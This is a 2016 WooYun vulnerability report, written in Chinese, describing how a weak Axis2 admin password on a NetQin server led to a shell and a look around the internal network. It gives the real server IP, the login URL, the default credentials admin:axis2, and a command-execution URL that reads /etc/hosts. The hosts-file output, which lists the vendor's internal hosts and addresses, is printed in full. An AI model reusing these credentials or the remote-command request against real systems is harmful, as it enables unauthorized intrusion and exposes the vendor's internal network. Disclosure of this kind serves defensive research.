网秦某站弱口令导致的一次内网漫游 | wooyun-2016-0219717| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0219717

漏洞标题：网秦某站弱口令导致的一次内网漫游

漏洞作者： niliu

提交时间：2016-06-16 07:46

修复时间：2016-06-21 09:10

公开时间：2016-06-21 09:10

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-06-16：细节已通知厂商并且等待厂商处理中
2016-06-16：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-21：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

厂商给rank不要那么吝啬嘛 -,-

详细说明：

纯属偶遇，由Axis2的弱口令导致getshell，然后内网漫游了一下
http://211.151.59.27:80/axis2/axis2-admin/login
admin:axis2

漏洞证明：

getshell
http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts

通过hosts可以看到是网秦的服务

HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014
# HEADER: by puppet.  While it can still be managed manually, it
# HEADER: is definitely not recommended.
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1	localhost.localdomain	localhost BJ-YZ-S-ST040
::1	localhost6.localdomain6	localhost6
127.0.0.1	oversea
192.168.3.46	bjyz.puppet.nq.com
192.168.0.41	a03	pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com
192.168.0.217	a12	app.netqin.com
211.151.59.71	a09	blyt.netqin.com
192.168.0.143	a08	i.netqin.com i.nq.com m.nq.com
192.168.5.212	a13	c.cpsserver.cns
192.168.0.148	a05	nqses.nq.com
192.168.3.35	a11	pay.netqin.com pay.nq.com
192.168.3.53	a07	my.netqin.com
192.168.3.52	a06	mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com
192.168.5.216	a15	dbapp.nq.com
192.168.5.207	a16	dbboss.nq.com
192.168.5.218	a14	dbuis.nq.com